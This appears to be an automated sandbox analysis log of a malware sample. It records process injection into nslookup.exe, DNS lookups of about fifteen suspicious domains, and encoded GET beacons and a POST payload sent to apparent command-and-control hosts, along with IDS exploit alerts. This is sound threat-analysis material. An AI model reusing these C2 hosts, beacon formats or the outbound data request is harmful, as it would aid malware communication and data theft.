Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"			Jump to behavior

Source: Joe Sandbox View	IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49735

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bedk/?OrsLbfS8=bNXGDlb8ijfNeMgmhZTZ4FzLofpKf3xMzeaEkkxrOS80wCjY80VgIVIW1XOxzrJ8jeMQ/0USGbOA1QV9Qk2cwvhhTVNhrn3OMd04uTPQDgeikoDHYJT4kBk=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.5hdgb2p9a.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /qbij/?OrsLbfS8=3yBxrJasAuf5uA+hQoF/UdNjpA1mjOQppauFPNhs8egGU99AKUFjj/YAtZh8NtvRPm16ZOtyDlQ/WV2EVpC6JJKWKngbR0sBrYN3Ow3Fjb2T/aVlNEtrO8A=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.newhopetoday.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /e8he/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=mcGmuIJBWUmo2lDG7CTv4Gt1AD2/t65Xpsjm/p8yMz9hwSbJDz6KNi59ZBCF4oReBQPM+VZI2rOrUFRTE3AGx/mYes3pi0uyq0yr/jogXTNeK0R00JyjXeI= HTTP/1.1Host: www.030002107.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /rmi6/?OrsLbfS8=t3B/ySOYfhPNBzSAJO2PeIlTvxqMvvMKm2+aczXZ+KWiESOL5TSkxmdrxkgz7erIyNCqFrrCS1YY58x1MNqIRQatYfOXWMySP/Ul5aAcDJS1p5+CjseaBkM=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.awarnkishesomber.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /d4tr/?OrsLbfS8=6GjJkyBPORqg+LRL5wohL8uehUs1YRairNTTSlIQnk9ILDzDMm7A4CMaqzx5lMKV1BWl24o1RRPKkV6Hwvttmy1MvEOfL/ZPV6gHev677HWBpMjxIhSB53M=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.marketplacer.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /p6wx/?OrsLbfS8=ttYzRxNxeO4f6fNYj7ateA+F6yVy2aipKItROGh8WVTkI3EaJmo1bYoDtPm0Qkaz9X7RChj3n3btpdcutQE91EFehfyc96F4CUsOSCLVSZ8PC2pgtayn56U=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.sonoscan.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /6qe4/?OrsLbfS8=WHKWWDhqUQguaHD8HDWaE7qBQd02+h4xtUFy2wcuZe9GFEuUV3KJnOgc+MFlJkMgsX0ap5tq75bc5roy2E0lQwuRPcH9jPJNFRK5EQo5//4rvuULl8WsxSI=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.plazerdigital.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /mkt0/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=isbFxoDUwOk3j3xnh/OVPcYsjNUxjmD84LrjxIfJoNaCt3w7XLSNRVY+pjf8GIX6//XCICVb17CzteC5yxbMAUKj5mlhkKSf9B39hvFNgAAh+ecOP0LS1bo= HTTP/1.1Host: www.nuvisio.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /b8r1/?OrsLbfS8=3L9o/mnND0P50Zs/rEVx+Tqc8Fn9XYBSc70e9GxS51tZs+FA1xnTHiNXLhJNSDrOiW73WMsPSvDz7sty9+eRPk0x9j1tfIyp/CKdkiUZ5xeLRHsV/7I5DTY=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.mjmegartravel.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /f1ri/?OrsLbfS8=oMmeEi6GnV1TPfvHfyKeoZR2G2AlgWmF7ByspnTr53JWt+ekrZbBZ03GIH86fGkviFflLcQb0Wtr9Yr8xEO9qCMiTKL2fFCWEg6tMZDOog2eIDJ06fLwNDQ=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.thesquare.worldAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /fo10/?OrsLbfS8=VGFom56gXSVJA7Re0aPPv0XQBrTc01jEMlgkAyxXIylstn9WlZVIj1RPFIq8ahjYg9DnA65nE6Z/GeehPrQWZwIXYucd9lGrXjcJj26WY1QYvIBel4N9GQA=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.d21dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /tasm/?5Js0X=9zex_vxPfbpDzDPp&OrsLbfS8=chfo68G3UC6OuE1JdDwjtuzwRmQzr0xqwO/eOUQkfVCUJ5qSOOAIPBbq5Mxy74dO36b9klXa7DOIS8apv5M0ByBegKUf2d3tajwjl7F6aqulZkhUeXkvRMs= HTTP/1.1Host: www.pridegrove.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /5p40/?OrsLbfS8=4QY5SYttqFPm1GPXCeeb59yMycudIMCosZoH9HQnPeP1XGLlojbxec8co2b1OCtaI7lF7PRey/VXHNAqh2cV8R44wHFaAEsLTvLEVRe4kIA7XM58BnjLzpU=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1Host: www.budged.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0

Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: nslookup.exe, 0000000B.00000002.4109044096.0000000004326000.00000004.10000000.00040000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4110834039.0000000006470000.00000004.00000800.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000C.00000002.4108330760.00000000036C6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.5hdgb2p9a.buzz
Source: global traffic	DNS traffic detected: DNS query: www.newhopetoday.app
Source: global traffic	DNS traffic detected: DNS query: www.030002107.xyz
Source: global traffic	DNS traffic detected: DNS query: www.awarnkishesomber.space
Source: global traffic	DNS traffic detected: DNS query: www.marketplacer.top
Source: global traffic	DNS traffic detected: DNS query: www.sonoscan.org
Source: global traffic	DNS traffic detected: DNS query: www.75e296qdx.top
Source: global traffic	DNS traffic detected: DNS query: www.plazerdigital.store
Source: global traffic	DNS traffic detected: DNS query: www.nuvisio.top
Source: global traffic	DNS traffic detected: DNS query: www.mjmegartravel.online
Source: global traffic	DNS traffic detected: DNS query: www.thesquare.world
Source: global traffic	DNS traffic detected: DNS query: www.d21dk.top
Source: global traffic	DNS traffic detected: DNS query: www.pridegrove.net
Source: global traffic	DNS traffic detected: DNS query: www.budged.net
Source: global traffic	DNS traffic detected: DNS query: www.roopiedutech.online

Source: unknown

HTTP traffic detected: POST /qbij/ HTTP/1.1Host: www.newhopetoday.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateContent-Length: 205Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.newhopetoday.appReferer: http://www.newhopetoday.app/qbij/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0Data Raw: 4f 72 73 4c 62 66 53 38 3d 36 77 70 52 6f 38 75 4d 50 4d 4c 50 74 57 4c 2b 5a 66 31 6c 58 2f 64 51 72 43 34 46 72 4b 41 33 31 5a 2b 39 48 39 52 31 31 37 39 6a 4c 2f 41 4e 61 51 68 45 73 70 46 33 79 63 68 4c 46 64 71 49 46 77 78 46 45 70 56 41 48 33 73 45 53 45 4c 46 61 4d 57 50 4a 59 44 6b 47 58 67 4f 51 57 6f 56 72 37 52 35 4d 79 76 39 71 59 2b 77 2f 70 64 59 50 41 52 33 47 50 45 72 35 2b 65 61 45 59 64 34 57 68 50 58 2b 56 71 62 4f 73 41 52 74 62 71 46 69 51 6e 50 75 4d 77 67 6b 41 75 35 6b 34 2f 72 78 6c 58 31 44 50 4d 54 56 6c 66 55 56 48 43 53 41 44 6c 53 46 6e 2f 61 46 78 73 70 32 73 42 62 2b 77 3d 3d Data Ascii: OrsLbfS8=6wpRo8uMPMLPtWL+Zf1lX/dQrC4FrKA31Z+9H9R1179jL/ANaQhEspF3ychLFdqIFwxFEpVAH3sESELFaMWPJYDkGXgOQWoVr7R5Myv9qY+w/pdYPAR3GPEr5+eaEYd4WhPX+VqbOsARtbqFiQnPuMwgkAu5k4/rxlX1DPMTVlfUVHCSADlSFn/aFxsp2sBb+w==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 40d1fc0a-8bdd-4d94-9685-9f6aa01e1070x-runtime: 0.023792content-length: 17104connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 0e1c2833-ab06-491a-992b-bcfecf41aeb4x-runtime: 0.021988content-length: 17124connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 621ce876-cdc8-4a73-97dc-a3df84f66997x-runtime: 0.022279content-length: 27204connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
